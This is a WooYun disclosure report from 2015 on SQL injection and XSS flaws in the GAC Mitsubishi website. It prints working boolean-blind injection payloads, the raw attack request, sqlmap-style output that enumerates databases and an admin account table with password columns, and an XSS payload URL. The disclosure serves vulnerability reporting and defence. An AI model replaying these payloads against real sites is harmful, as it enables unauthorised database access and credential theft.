当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0142468

漏洞标题:广汽三菱官网SQL注入/XSS漏洞打包

相关厂商:cncert国家互联网应急中心

漏洞作者: 霝z

提交时间:2015-09-23 21:35

修复时间:2015-11-09 17:16

公开时间:2015-11-09 17:16

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-23: 细节已通知厂商并且等待厂商处理中
2015-09-25: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-10-05: 细节向核心白帽子及相关领域专家公开
2015-10-15: 细节向普通白帽子公开
2015-10-25: 细节向实习白帽子公开
2015-11-09: 细节向公众公开

简要描述:

SQL+XSS

详细说明:

1、SQL注入
2、XSS跨站
1、SQL注入
1.1 注入点

GET /Ajax/CommonHandler.ashx?method=DealerInfo&CityCode=4401&Where=%27+OR+%27ns%27%3d%27ns HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36 Netsparker
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://**.**.**.**/BuyTools/BuyChooses/DealerSearch?tow=
X-Requested-With: XMLHttpRequest
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: **.**.**.**
Cookie: ASP.NET_SessionId=tkfjxlpktswxl3cbbnhjqln3; SC_ANALYTICS_GLOBAL_COOKIE=f4b1236f12cd4844a44d5be7e0a051d7; SC_ANALYTICS_SESSION_COOKIE=E7D9D5BAF68E4D18A25EC94839FA5F00|0|tkfjxlpktswxl3cbbnhjqln3; MITSUBISHI_COOKIE={"Car":"{\"1100000501\":6}"}; \"1100000323\":1}"}=; NewsId=dbc2158a-090c-490f-9b66-346d574e3947|fa7168aa-60b3-4b10-8ea7-c49b186ee3cb|226c662d-6db8-469e-b7ce-f1eee1d6f26a|f351b356-d753-46a3-8d2e-f179fde37491|c3dcd749-e362-4add-beee-650047eaf8ee|5fe1f30c-c954-428d-9d2b-32f5e740267a|73c06fb6-2a84-4562-8341-35c5b2368cc8|2f97806f-5b19-4f98-bf38-0bfece5d539d|cf816137-b05c-4ed1-b28a-02b0dbd2587f|08c6716e-93e5-486e-868b-c598a08634e1|da49e78f-5fc9-4eb3-beaa-b452dc89cda7|67ca10f9-9e2d-48cf-a52f-5faf7aa6d80b|283a20e9-89dd-485c-b40d-eb177ca1700f; website#sc_mode=edit; shell#sc_mode=edit
Accept-Encoding: gzip, deflate


1.2涉及数据库

Place: GET
Parameter: Where
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: method=DealerInfo&CityCode='+ (select convert(int,CHAR(95)+CHAR(33)
+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+C
HAR(97)) FROM syscolumns) +'&Where=3%' AND 5562=5562 AND '%'='
Place: GET
Parameter: CityCode
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: method=DealerInfo&CityCode='+ (select convert(int,CHAR(95)+CHAR(33)
+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+C
HAR(97)) FROM syscolumns) +'' AND 9587=9587 AND 'kCYY'='kCYY&Where=3
---
there were multiple injection points, please select the one to use for following
injections:
[0] place: GET, parameter: Where, type: Single quoted string (default)
[1] place: GET, parameter: CityCode, type: Single quoted string
[q] Quit
> 1


available databases [10]:
[*] GMMC_Extend
[*] master
[*] Mitsubishi_master
[*] Mitsubishi_WeChat
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] temp
[*] tempdb


1.3 tables和columns

Database: Mitsubishi_WeChat
[13 tables]
+------------------------+
| dbo.Account |
| dbo.AdminAccount |
| dbo.Articles |
| dbo.AvailableFunctions |
| dbo.Exception |
| dbo.Member |
| dbo.Menus |
| dbo.Scenes |
| dbo.UrlInfo |
| dbo.UserPhones |
| dbo.[KeyWor s] |
| dbo.hn |
| dbo.urlzm |
+------------------------+
======================
Database: Mitsubishi_WeChat
Table: dbo.AdminAccount
[5 columns]
+-----------+----------+
| Column | Type |
+-----------+----------+
| Account | nvarchar |
| Id | int |
| JoinTime | datetime |
| LastLogin | datetime |
| PassWord | nvarchar |
+-----------+----------+


2、XSS

http://**.**.**.**/SearchResult?keywords=<IMG src="/JaVaScRiPt.:alert"(&quot;XSS&quot;)>

漏洞证明:

1、SQL注入

sales.jpg


bmzd.jpg


2、XSS

XSS.jpg

修复方案:

1、过滤参数
2、还是过滤(特殊字符)

版权声明:转载请注明来源 霝z@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-09-25 17:14

厂商回复:

暂未建立与网站管理单位的直接处置渠道,待认领.

最新状态:

暂无


漏洞评价:

评论